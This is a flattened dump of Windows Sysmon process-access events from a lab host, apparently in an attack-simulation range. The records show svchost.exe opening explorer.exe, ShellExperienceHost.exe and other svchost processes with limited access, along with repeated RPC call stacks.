16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 